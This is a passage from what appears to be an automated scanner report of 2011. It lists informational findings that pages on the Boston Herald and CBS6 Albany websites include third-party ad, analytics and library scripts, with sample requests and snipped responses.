Date: Sat, 29 Jan 2011 03:37:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.774. http://www.bostonherald.com/track/track_gals_tv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/track_gals_tv/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /track/track_gals_tv/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:37:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.775. http://www.bostonherald.com/users/register previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/users/register

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.776. http://www.bostonherald.com/users/register/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/users/register/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.777. http://www.bostonherald.com/weather/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/weather/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /weather/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:04:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.778. http://www.cbs6albany.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/adsense/?position=0&scode=wrgb
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=homepage&shier=homepage&ghier=homepage
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js
http://img.video.ap.org/p/j/apovn.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://www.flashadengine.com/include/js/faeDivAd.js

Request

GET / HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:07 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:07 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 78123

<br clear="all" />

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:
...[SNIP]...
</script>
   <script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/common/tools/load.php?css=common_layout_newspaper_nonav,common_nav,common_search,common_zvents,common_broadcast,common_apticker,common_bc3,site" />
<script language="javascript" src="http://www.flashadengine.com/include/js/faeDivAd.js"></script>
...[SNIP]...
<div id="stats">
       <script type="text/javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=homepage&shier=homepage&ghier=homepage"></script>
...[SNIP]...
</div>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div class="fi_sidebarInner">
   <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
               <script language='javascript' type='text/javascript' src='http://common.onset.freedom.com/adsense/?position=0&scode=wrgb'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/15135/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

18.779. http://www.cbs6albany.com/albany-community/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/albany-community/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=community&ghier=community&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /albany-community/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:22 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:22 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=community&ghier=community&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.780. http://www.cbs6albany.com/albany-tv-programming/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/albany-tv-programming/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=entertainment%7Ctv&ghier=entertainment%7Ctv&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /albany-tv-programming/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:18 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:18 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=entertainment%7Ctv&ghier=entertainment%7Ctv&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.781. http://www.cbs6albany.com/albany-weather-forecast previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/albany-weather-forecast

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=weather&ghier=weather&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /albany-weather-forecast HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:35 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:35 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=weather&ghier=weather&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.782. http://www.cbs6albany.com/common/archives/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/archives/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=Education+Promo&ghier=news%7Carchive&us=anonymous
http://edge.quantserve.com/quant.js

Request

Response

18.783. http://www.cbs6albany.com/common/archives/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/archives/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=Local+News&ghier=news%7Carchive&us=anonymous
http://edge.quantserve.com/quant.js

Request

Response

18.784. http://www.cbs6albany.com/common/archives/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/common/archives/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=news%7Carchive&ghier=news%7Carchive&us=anonymous
http://edge.quantserve.com/quant.js

Request

GET /common/archives/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:41 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:41 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 33561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=news%7Carchive&ghier=news%7Carchive&us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.785. http://www.cbs6albany.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/search/

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&ctype=search&cname=site+search+results+article+newest&shier=search%7Clocal&ghier=search%7Clocal&searcht=&searchr=&domain=www.cbs6albany.com&fd=&us=anonymous
http://edge.quantserve.com/quant.js

Request

GET /search/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:30 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:30 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 47273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<br />
<script type="text/javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&ctype=search&cname=site+search+results+article+newest&shier=search%7Clocal&ghier=search%7Clocal&searcht=&searchr=&domain=www.cbs6albany.com&fd=&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.786. http://www.cbs6albany.com/sections/abouthdtv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
